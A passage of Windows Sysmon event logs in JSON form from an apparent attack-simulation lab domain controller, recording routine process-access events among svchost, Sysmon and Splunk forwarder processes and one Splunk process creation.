ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-203C-5F25-0000-00105A120600}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-203C-5F25-0000-00105A120600}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.804\r\nSourceProcessGUID: {41C8662E-203C-5F25-0000-00105A120600}\r\nSourceProcessId: 1328\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.804","SourceProcessGUID":"{41C8662E-203C-5F25-0000-00105A120600}","SourceProcessId":"1328","SourceThreadId":"4488","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.899\r\nProcessGuid: {41C8662E-203D-5F25-0000-0010E2140600}\r\nProcessId: 4496\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.899","ProcessGuid":"{41C8662E-203D-5F25-0000-0010E2140600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: 